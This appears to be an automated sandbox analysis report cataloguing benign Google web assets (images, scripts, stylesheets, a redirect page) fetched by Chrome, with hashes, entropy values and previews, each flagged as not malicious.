                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://lh3.googleusercontent.com/Ac9zapU8rN332VMysmJIaTk1Nk-3IGzqCwFS-6PwDFUFpEzEBKPTGWfIFN4BXL3eHP5s1DJP2tyh8NTS8_LjvXHzpkyZC2fu58Ov=h120
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...x...x.....9d6.....sBIT....|.d.....IDATx...O.A......w....X.E.4j..0..km......Y..WY.K;[.-T.j,.P4..D..1....{;..H,..7;o..Ob;;.o..... """"q.....?.....K..%.9._?.~/.Z....r...E..#.:...g...u..sX_[....p.9<...r.b.F3=.8...........\8.{7.....l..c...6&[C.7.....f:.....J....HO.x`..^S...}.dk0.Fv#...X.5....\."[{O...........O....2..^.,G.......^.,O....a....8.......}.b...^...h....'......}.b...:x1p...^..O......|.b....^.....d..}..........\.^....j..........J.j.....2.<*.>T{...!...xG........l......1.q.l......1.q.l.......Yt;.:i.]t.T.N*....N....F..:Y...N).^......l;.O............|.....J.U.&9.l...I.^.j..l$......?V.T.{....=k|\..nT..g..-./BU6.......Rx..H..Ib`...8.6...S9E.P..-.P....P..wpQ....Ye`........m;Z..l$........BY...<....C.$1.q.l........5..6z.^_......+e....Ddu....>.` ..w..."R...0.q*.k=z+"uC....j..z.\[...Z.....sB<...<.....Lr..8.6...c`...8.6...c`...8.6...c`...8.6...c`...8.6...c`...8.6.@`.B~.....=.....{ .....h.......a............_..,........p....#..C.o..O...
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (8509)
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):249346
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.556243781170543
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3072:8ax8eulMYeiCeG007lXol0VQbQwM87Ns0RsEemtJeNvZzVDOLN5tT:8pmFLlq0Ud7PsEemvetzO/l
                                                                                                                                                                                                                                                                                          MD5:F4F7710878B94F1CDD5DB17E6AB1A9A1
                                                                                                                                                                                                                                                                                          SHA1:6424C3E3A6E495B89C69D455D3BEF0EC31B748CE
                                                                                                                                                                                                                                                                                          SHA-256:C5B683AB36AD0AF3530A58BD4B37D8B81CC360A8A73A8F1496417462888D5DB8
                                                                                                                                                                                                                                                                                          SHA-512:98D80A1AFEE23140CEE255E6B36F16411EC1F5F95EDD52E1336902980AB943E22371D180C2FDA215FCA32018AAF02CE369DF3D018166692F8FD0236EC2F6E7A7
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"15",. . "macros":[{"function":"__v","vtp_name":"gtm.elementUrl","vtp_dataLayerVersion":1},{"function":"__u","vtp_stripWww":false,"vtp_component":"HOST","vtp_customUrlSource":["macro",0],"vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__u","vtp_component":"HOST","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__remm","vtp_setDefaultValue":true,"vtp_input":["macro",1],"vtp_fullMatch":true,"vtp_replaceAfterMatch":true,"vtp_defaultValue":"false","vtp_ignoreCase":true,"vtp_map":["list",["map","key",["template",".*",["macro",2],".*"],"value","true"],["map","key",".*kintaro|appspot.*","value","true"]]},{"function":"__e"},{"function":"__v","vtp_name":"gtm.triggers","vtp_dataLayerVersion":2,"vtp_setDefaultValue":true,"vtp_defaultValue":""},{"function":"__remm","vtp_setDefaultValue":true,"vtp_input":["macro",2]
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):1168
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.186846820567803
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:tzLNjuhNxcQzadn/RaSAOX5q49asPdkhxEFV4efgRvFbxXh128RpCThFc01kBMN7:5NGMQzaZ/MSNs49aEdkbEX4eEvVIZThL
                                                                                                                                                                                                                                                                                          MD5:D05A4360FDF0883BD63CD699ED2417B9
                                                                                                                                                                                                                                                                                          SHA1:81EAB35B7605F78C4BEB600F436FE99121F603E5
                                                                                                                                                                                                                                                                                          SHA-256:ECB482338A6D7A86B9EC1C65B3D6EEAE81F976E64BD0E9712A53262E87DBBA07
                                                                                                                                                                                                                                                                                          SHA-512:E707841258DC365BA774622FFCD1695463DF48853ABBF8CD623A1180B20CA39468C76CCD4B218CD98F4F38824100DCBB3C326FF09011126D4A1EC7C0DFF65A11
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://www.gstatic.com/marketing-cms/assets/images/d4/f9/428d36f24eb8ac9d435876d1a97f/vector-4.svg
                                                                                                                                                                                                                                                                                          Preview:<svg width="32" height="34" viewBox="0 0 32 34" fill="none" xmlns="http://www.w3.org/2000/svg">.<path d="M3.45308 6.99992H6.78642V8.66659C6.78642 10.4999 8.28642 11.9999 10.1198 11.9999H20.1198C21.9531 11.9999 23.4531 10.4999 23.4531 8.66659V6.99992H26.7864V15.3333H30.1198V6.99992C30.1198 5.16659 28.6198 3.66659 26.7864 3.66659H19.8198C19.1198 1.73325 17.2864 0.333252 15.1198 0.333252C12.9531 0.333252 11.1198 1.73325 10.4198 3.66659H3.45308C1.61975 3.66659 0.119751 5.16659 0.119751 6.99992V30.3333C0.119751 32.1666 1.61975 33.6666 3.45308 33.6666H13.4531V30.3333H3.45308V6.99992ZM15.1198 3.66659C16.0364 3.66659 16.7864 4.41659 16.7864 5.33325C16.7864 6.24992 16.0364 6.99992 15.1198 6.99992C14.2031 6.99992 13.4531 6.24992 13.4531 5.33325C13.4531 4.41659 14.2031 3.66659 15.1198 3.66659Z" fill="#202124"/>.<path d="M31.3698 19.0833C30.6864 18.3999 29.5531 18.3999 28.8698 19.0833L20.9698 26.9999L17.2031 23.2499C16.5198 22.5666 15.4031 22.5666 14.7031 23.2499C14.0198 23.9333 14.0198 25.0666 14
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:HTML document, ASCII text, with very long lines (357)
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):1109
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.059009292233966
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:hYeZMxqFL3kvf6hH3mZJ9HjPJlP7FL3kvf6hH3mZJ9HSt4AEdURBIyK7FL3kvf6o:hYeZMxU2J/t2JStNEuCt2JCLKFwU
                                                                                                                                                                                                                                                                                          MD5:0742131B8197099715ACC9BA419F7D16
                                                                                                                                                                                                                                                                                          SHA1:74D3420A24A5AF7A809F05F0DA8AB950027BEA2A
                                                                                                                                                                                                                                                                                          SHA-256:94323ADB1AD9E648663BBA8D31E3358F7ADC58BFFD7A9965DA74C961259E285A
                                                                                                                                                                                                                                                                                          SHA-512:365FFC35ABEC06C9EBB607C6F8C88E46535DFA9E4D3B7B8A40EC536F5CDA57702098426740F6F78B960EE99D4B84CC8B4A19AD3F77599315C389C7614228DE21
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://www.google.com/services/?subid=ww-ww-et-g-awa-a-g_hpbfoot1_1!o2&utm_source=google.com&utm_medium=referral&utm_campaign=google_hpbfooter&fg=1
                                                                                                                                                                                                                                                                                          Preview:<!DOCTYPE html>.<html>. <head>. <meta http-equiv="refresh" content="0;url=https://smallbusiness.withgoogle.com/?subid=us-en-et-g-awa-a-g_hpbfoot1_1!o2&utm_source=google&utm_medium=ep&utm_campaign=google_hpbfooter&utm_content=google_hpbfooter&gmbsrc=us-en_US-et-gs-z-gmb-s-z-u~sb-g4sb_srvcs-u">. <script nonce="vkqqshcxWw1vuyqM6aLNRA">. window.location.href="https://smallbusiness.withgoogle.com/?subid=us-en-et-g-awa-a-g_hpbfoot1_1!o2&utm_source=google&utm_medium=ep&utm_campaign=google_hpbfooter&utm_content=google_hpbfooter&gmbsrc=us-en_US-et-gs-z-gmb-s-z-u~sb-g4sb_srvcs-u";. </script>. </head>. <body>. <p>. This page has been temporarily moved to <a href="https://smallbusiness.withgoogle.com/?subid=us-en-et-g-awa-a-g_hpbfoot1_1!o2&utm_source=google&utm_medium=ep&utm_campaign=google_hpbfooter&utm_content=google_hpbfooter&gmbsrc=us-en_US-et-gs-z-gmb-s-z-u~sb-g4sb_srvcs-u" target="_blank" rel="noreferrer noopener">https://smallbusiness.withgoogle.com/</a>. </p>.
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 96 x 96, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):3474
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.906705354957975
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:96:fH/89MTAtNzvtDChFivV6c4w8yQ+eQOQUNXoE:fHUGOhlD3LBQ5RQrE
                                                                                                                                                                                                                                                                                          MD5:C7A62EBB42C7293340F757585E5F9FE4
                                                                                                                                                                                                                                                                                          SHA1:4F3E5748467A67F101BDEF55F0C7D031A99B1A68
                                                                                                                                                                                                                                                                                          SHA-256:C09D791CF8ACC8E56F10D9D271CAA38467E4DEAB5C16F9251B83F0385A81F221
                                                                                                                                                                                                                                                                                          SHA-512:FF0AD969E7311B029A90B01B600CB4445CBC745F0216070C2F2676F18D1F8C0E974E8B16EE89BE1969F6C40567C12B22E236ED03674964037C4D42E90594B7AE
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...`...`......w8...YIDATx..yT....?.h......z..^............bE.hQ.UT.#...A@@V5&$$..v[..Z...VPQ.Z......b.;.....N.$.:.9.sD.?..w>g.................7.e.F..C.c.........[.~...}.oVm...k...n..S[.e.6.[..Y..r...s.~K...r.V..~T..[R...'....h..dQ...=?m.W..g...L..]..AV|;..m.v.p{..a......YO._3...g[xi..<...Y.....Z...Y... >wJ.()...~Y..n.. S).w.zE..P.(..r...^!J9...mt..|.,:.....3..!.bNF..v.=w ....q..WH.@.P..%&(...eGkX.....u=+.5.<Ol.....d..f...kE!....{..x..BQ-.w......'....m.e......I.....-.i....CA.P..P)@.S...'..._f.e......../..8B.-.=.....0.^......z.......-,..|&=...@%V.>..#..&..b.x...!/.E...k...".{....-...oq>..u.?..b.}2.B..v...BR..5D.....P..?{..-.u....G..E...u..NL."....p..GJ]..Z.B#e..V.,...o...ql...%9s.... )Aw.P.....B|..*FWf../xV.5.D...S.B>*.E.kH7.....R....;.....8.^..$....N...X.B<...@....C.D..S........}/...;..&.v=........PtR..|xt.ckz....M..k..^!.e..@D...<..........l.3....5.M..H<.v...T..OK...qgOj./.nMz.R>...tT.}L.\.q...8.e.y..Sy.$..o.S.b..3.c....N6.
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):67252
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.010564977133134
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:768:uwKohc6yjvmKYbX6Dz7H58CRwmOFTFVjQohT:vhejmK66LH58CRwmOFTPl
                                                                                                                                                                                                                                                                                          MD5:58186283039FD82024FE3CC0F3032916
                                                                                                                                                                                                                                                                                          SHA1:F44F7E80E570FBCD91587C7C0C11A07CD3E5B6C9
                                                                                                                                                                                                                                                                                          SHA-256:288E4AC8729B7339529AD9D622AAB67F2D913F2E5B88136076732E015D643650
                                                                                                                                                                                                                                                                                          SHA-512:911766CCC2533A3C0F8BBCBE8729220818EAB99F15D14328F36F76B0262AA223D8421F1B4F5431A5D3C972A1286FA6045E37193F900E7DEB4FC3A783A3BAFF1F
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:RIFF....WEBPVP8L..../....u!...B.m2.g..."b..n....O}.....F..`..f..pX$.)..,N.Z.....E..~b.).p....(...W..m..I.B.j.4.E.c.v...tY...R69.IN...-O9..s~........mu.l.c.c.%C.0.I...]......G\..}O^..h.f.2.!7m...'..H.4.1.y...m...m..D.d)..N.8..7N.3sg.}..&.q.?......b......-[.E.>|..$[U..,..eP.*......i$m..W....9.._I.M.y:V.v$J.........-I..I.FA.....7....}3..vW%.5k....~.'..fBm..a.....;.}0O.;.,}.P.m.1^#..F.......m.6z....;`.l2....nv3.9.Y.*9.9.^V..7J.Y./0..>I.....l.v.HG..2c1.........a4.........vs...W..@N..27.j.YM....vY...A.......m\D(1.r.]4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 120 x 120, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):3665
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.908096599643296
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:96:OS6Vh6C7mb2FUt1ZDr/gTPNGIkNj9/lsKH3yXv7LyC7j9YRE:OS8S6FmZ/8aHtD3wTLyQj+RE
                                                                                                                                                                                                                                                                                          MD5:9C1533227615CCEB423094AC7DA39F8E
                                                                                                                                                                                                                                                                                          SHA1:978DB48B75CD3CDB75007D4A8726F01CD45E9848
                                                                                                                                                                                                                                                                                          SHA-256:5B52B75FB36BAFDA3D8C642D65CCCD5E38913DBF5CA10C70AA4B57FCF95A2764
                                                                                                                                                                                                                                                                                          SHA-512:933B48E44167626C2AA50195B85B1EAA20AC7618A88F18F6B05FCFBF1C6009632F6318AAB6B10AFD5FE67000D68C4114B9107F668F84B85ABB92A0A965F2756C
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://lh3.googleusercontent.com/6heYcmK08nJrjH3yvIin-c8kYQbqTfUs9t-8QUdkxIBcGvGMZ2HVhe2jIYrIRmWOn8qXvivlwGvVDfv9gr8r0ahcQBOqYqITNZB9T0tz_SS2bnOScJY=h120
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...x...x.....9d6.....pHYs.................IDATx..kp\e.....n.K.........5! ..d........Xo#8..A...../..w.FT..q.....Z...n.B.R..k...4....s..m.6{=.{vs.o........{.y..>.....Bp1[]..zY18...pV..8+...p._...g.Z.........Z@~jx...d.t7dT..27.5.:.f`...&.o..N.O.~.....}......R.[........*..l....t.......:.\15<.].*..,.v..I.7..<p....\U.P.......7...i.\.............o......t. .|...M.Z-%....Mk...%...S..s..Z..5.WX.....l.A1...D.w.b....@tB.............w"{.9..'....].)...i.].@...-A.o.j.. .|.j..+..V ....z.f..d.P...AC......x.x..<.\>5<.G....(....'&.~.....g.2..).......Q.v...!`.v..x...pq..2.Xl.E...SP..1.G.@fjxb.....;:6.p..h....:........n.....EU..5.Z .\.....n.,.~|<2d.Zk....S....H....;.[..v...+`kx..U...n...!.Z.../.KtFBw.......j.h.......F.......pud.zTW]e........F.j.c.A.L.....0..A3..l.mr[.....7..Fv.M..(~/.n.h.......7..Q.ILB.dr.z.....8!l...\..P.C....=....g...G.y.s..zR.v!."p.......-..Ks.8.ld..E..]..9..!...u"...=....Z.....np$d..K^".w..q...;..j..a.X-,y...a...Z...j..]
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (3349)
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):4778
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.311499526671108
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:X7VfjpQggW1F5118PrFth/0ZuIZ3iVY0Y0uiRFnHe+M61dM4oPZUARcRfKPyJqb:XpfZ57cR/KpeY0YE++/BlooCa8
                                                                                                                                                                                                                                                                                          MD5:74AE03DE4D07836C6EBB91E00E5AB8E6
                                                                                                                                                                                                                                                                                          SHA1:98CE84BB4F325B80AA657824FE55B7BB159CE030
                                                                                                                                                                                                                                                                                          SHA-256:DF21B45313EEB6DC1855782370C74A00803B9CB8313C705620B7554BB6FC46E5
                                                                                                                                                                                                                                                                                          SHA-512:871AB6B36E001E75D1282316A24E7DE6BD76E19B0C5AA6C907682EDBF52766FB04F4A27BB54C9CBB5ADA3C6C59CEFC61194AEA50BAD301F2D75F9114E17BB29F
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://www.google.com/search/howsearchworks/assets/CiLn66Ai.min.js
                                                                                                                                                                                                                                                                                          Preview:import{r as m,s as v,x as u}from"./ycaG4YXp.min.js";import{e as b}from"./0XPwTFcg.min.js";import{n as w}from"./IYoTYjYE.min.js";import{t as p}from"./ianzD0dL.min.js";import{e as h}from"./p9kcPq91.min.js";import{i as y}from"./IFunn9hk.min.js";import{o as d}from"./5Ss99t85.min.js";import"./_OAi-NRQ.min.js";import"./RpI-OtYr.min.js";import"./rwBjrn-0.min.js";import"./bAPu5B1A.min.js";import"./lHimDk5Y.min.js";const _=".container{width:100vw;height:100dvh;position:fixed;top:0;left:0;z-index:999}.container__overlay{position:absolute;width:100vw;height:100dvh;top:0;left:0;background-color:#202124}.container__close{margin-top:2px;--hsw-icon-color: #000}.container__close,.container__overlay{transition:opacity .3s ease-in-out;pointer-events:none;opacity:0}.container__close\\:visible,.container__overlay\\:visible{opacity:1;pointer-events:all}.drawer{--hsw-button-color: #5f6368;display:flex;flex-direction:column;background-color:#fff;position:relative;inset:0;z-index:50;height:100dvh;transition:t
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 120 x 120, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):5805
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.9542006310437126
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:96:t9UzyN3uV9rFvd89BSK+b+n3P/WB64548U3zuH1pgD/ln5KCKH:/U2N+V9rj8DSK+bB5DKuH1oln5lq
                                                                                                                                                                                                                                                                                          MD5:D0656A971972F0807AB746BE522ADD05
                                                                                                                                                                                                                                                                                          SHA1:5DEB386A5C5481D9A4AE91E37E175A4E656AE245
                                                                                                                                                                                                                                                                                          SHA-256:C7B0BC63C6F5631DADD177E4EA287231713A0FF78A36213806ACC9BF760A4D4E
                                                                                                                                                                                                                                                                                          SHA-512:6DC7991439E91FF4901ACF4AB19FBFC83A9B9E5CB26ABB9987FA72937C84609407A894806B2E7802419C7A550C7F3075DCE0DA33063705ECC51F8F957A6D3D79
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...x...x.....9d6.....sBIT....|.d....dIDATx..y....?.{o/4K./..(.`.d......8..I.8.3.e.%...8nAt.h.'.8O6......q.lFE.D.PD.f...Uu......t..[....y.~.....U.:...s.D..%J.)Rh.r..*...2M5$..16.5.. .D...E."&....'..=/u.WnK..@P....=Y.*=kf..Vc..F..F9*i..~80..:T..P...A.BU2j.RF....m.........1...<.W.]...S.."=M..:..H...&.z...?...*...H.[RE...*!i...k..".;.'b.6*o".5..$..>...0...9=A.:o.D\..:ew&..Q..w>v].........*....D....H..<.f..^..sF.....3OD......iIk..D..........`w.t.. .pyQ.[..H...)6.c:....F..#.....DE.......V.{...,.'V>.4.......g.8....fnK.c.FD)>a[#.~....=.%..!Y....-.{..._&.0..._V...R......=..2 .nu..7....]..K...PT..nE..mO..y..*lk..X......<.j1.*..%..z..k|.....a[#.U..1..Y.......C>.....w.ra.$...k..'....}yr.?..~....?.....c8.m......y.yj....|..=c.u.}{S...Pm.b...j}J..G>.....E*.^...... ..B.c>u..=..omj..["O...HGe+2.u...H8wn......m..H.6......x.,_.;.;..)z........%q..*$.qj...8....8=.y.. |sW..4.s;-.A....>Y..7Q..e.-:o........s...I..s.,_u.P.....`=c.4..+.%q;...
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (41264)
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):41265
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.255702162721616
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:384:AH5thLF7Yl3KNGeAReVdh/yabPbM3mIVN1wdxo2+yeDUKeJypSaBXELThZNLXaa5:AH5thLF7Yl3KNGeAH3mIVN12xoBf+
                                                                                                                                                                                                                                                                                          MD5:8F29CEDEDC2A7DC302D9D7001FA2B11A
                                                                                                                                                                                                                                                                                          SHA1:47550F122CC393279A690B991D045FA7EB27D5DF
                                                                                                                                                                                                                                                                                          SHA-256:F9018C2ED87E36B3FF4B96D5E5FC8E4E532F7BDDD7892296BBC966A468395065
                                                                                                                                                                                                                                                                                          SHA-512:349B1108F3BB98DAF2EF775CF567165B719249DDC1B4F29BE4F7C2CDEA6757F0E652B488F1AD46D80F3223D6B8268A0099DACE8EB96DB893E3338C1A4C87B9B6
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://www.google.com/search/howsearchworks/assets/axwyNx0d.css
                                                                                                                                                                                                                                                                                          Preview:._container_bt9cp_1{padding:30px 0 0}@media (max-width: 1023px){._container_bt9cp_1{padding:24px 0 0}}html:has([data-subnav]) ._container_bt9cp_1{padding:80px 0 0}@media (max-width: 1023px){html:has([data-subnav]) ._container_bt9cp_1{padding:24px 0 0}}._opt-background-blue-50_6xn19_1{background-color:#e8f0fe}._opt-background-grey-50_6xn19_5{background-color:#f8f9fa}._opt-background-yellow-50_6xn19_9{background-color:#fef7e0}._section_6xn19_13{position:relative;overflow-x:clip}@layer component{._opt-background-blue-50_1vmys_2{background-color:#e8f0fe}._opt-background-grey-50_1vmys_5{background-color:#f8f9fa}._opt-background-yellow-50_1vmys_8{background-color:#fef7e0}._spacers_1vmys_11>._opt-mobile_1vmys_11{display:none}@media (max-width: 767px){._spacers_1vmys_11>._opt-mobile_1vmys_11{display:block!important}}._spacers_1vmys_11>._opt-tablet_1vmys_19{display:none}@media (min-width: 768px) and (max-width: 1023px){._spacers_1vmys_11>._opt-tablet_1vmys_19{display:block!important}}._spacers_
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2091
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.8938748179764
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:aGmurFSJs329qIqvZO7N4+lRSm+3gdfI8hV92jPH9b45MloqbSHTrpG:4QUvKI7943UJhn2jP3pUG
                                                                                                                                                                                                                                                                                          MD5:6282A05D151E7D0446C655D1892475E2
                                                                                                                                                                                                                                                                                          SHA1:B2B05F319DA0E73250200AE9BB518A318D6B4C5D
                                                                                                                                                                                                                                                                                          SHA-256:4CAB9CF78FD7C85AE2236CDD47B905FA4173F664946DFAB008591B3CFE4280B7
                                                                                                                                                                                                                                                                                          SHA-512:DF0C4C01555430BD2AFAD409E40A422F5EFB0ED9B6E86168874B46312FFC0BA7CA2B5503E49858035056C342A83CBC42721AA89077BD2E1F698692AF4277BAB5
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...0...0.....W.......IDATx........m.tm.86.m.m...m.Xo..._~..Mm.&..x....v.....?... .~^.TV....z.wK.....-.`..w.............4....."...z6Z."....`;@....!...S.Q..E...L$..`01..S(.v...vn._...H.......H.fs.8).*....q....\....9B>...)>#2...A....z..8.#+A.V-..h*h....3.......c.......F. 3.......~.^Q......c.....a.1...gZ....y....wU..2...].-.0b].......[.....*.w...&K..$..K..\.t..QoY..O?....u.Sa.*-...na.Z..}..._s..~[.Ue.M.!#Y.....%.t.7y....J......Q.0fC.Fo..@..&...B.*....&..}.ld....O.#+...<.z..,."?vC....Y.....<d..."b.D.(sX..c..5.z,..!...oV.. .....>O.#..pHG..y.j.7.-@.K.s..,...&.%6.. O=dj....S..;.O..ylc.O.~....Tn.F.|.Y..X..@........e..O.Z......}(H...vp.... ...y..&..:.......8y...{n..R^...:*.q.......>....C.....^P..C..%..<. 6...9..,.$0x.M.=.`\..MI..|.........^...W-"...@..J........K.m...h...x.H.>.c.>.w!......:X.b%.v....)..[R..-..>.+!..?...?.....Q.G:F...k..A.)`*.^N$...{9.<.PD...7`).3.d........h.k..{]&.;^.h.s>BREP.X.O.~P|[....R].m,.......Z..Pk.g0.yl...Z.qp..
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 1440x810, components 3
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):53312
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.571619300895356
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:1536:1cEYS024fNwJS0iIuRc21XeOPL++oz5Cr5kb6vzQ:ueSFF0iIk1XeODHooreb8M
                                                                                                                                                                                                                                                                                          MD5:7A848CF1B5D81C6E5240AC3F418C7C8D
                                                                                                                                                                                                                                                                                          SHA1:985C799F4E445DAFB8D3D4A6C880297CE90AB50C
                                                                                                                                                                                                                                                                                          SHA-256:0A65C954EFA353872007EAC4DD28AB7B68F669870B87F66284A8E5D0CA15A7D0
                                                                                                                                                                                                                                                                                          SHA-512:E64A9133C9AC4FB9820AB4AF181D6A7235958B2B1FF410A6D826E408A604B6CA4B8D2BFBE82E42982D39655CAF7551EFFE536BAAA211B2EF0329F0A83E026CE8
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://lh3.googleusercontent.com/bTCEdj_CIN7JchQHPPZaDQfS-zd-ubGjDb-kaEWcKuBbed54w1zLWdO9IQkJxw6HNDuiCPhY4-koCUa_cldyveHYWS0ALuUGKj4Urbf3rbXbX4UeUmQ=w1440-l90-sg-rj-c0xffffff
                                                                                                                                                                                                                                                                                          Preview:......JFIF......................................................................................................................................................*...."..........................................l..........................!1..AQ."aqu.....23RTst................#$%&46BSUVb..5r.......CFv....Ec...D...e..................................8.......................1.!Qa..Aq...."Rr...2B....3b.#S.............?..C......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (42672)
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):381374
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.28698251444922
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6144:DFyGeyxWOuThBurw1Ynfq52cEHlzfaeBWyT:5yGiYaSlrD
                                                                                                                                                                                                                                                                                          MD5:EA765C6DD1ECA878E6CAB0F9C592EF5B
                                                                                                                                                                                                                                                                                          SHA1:9792A4CA433AA68EBD7235355B5828C99B0122B3
                                                                                                                                                                                                                                                                                          SHA-256:80529CFFCCCD43C429664BC3A2D29464B06A87DB29521E6EB8BB681FD842CE82
                                                                                                                                                                                                                                                                                          SHA-512:24DEDD7522AE3215DE77EEC55100090AE5D9CCFD127E68CB35D625AAE60D9D85955EA88E7403A1B01235F4CC2C4D63357168FA4D1057EC3CE06E65785653399F
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://www.google.com/gmail/about/static-2.0/js/main.min.js?fingerprint=ea765c6dd1eca878e6cab0f9c592ef5b
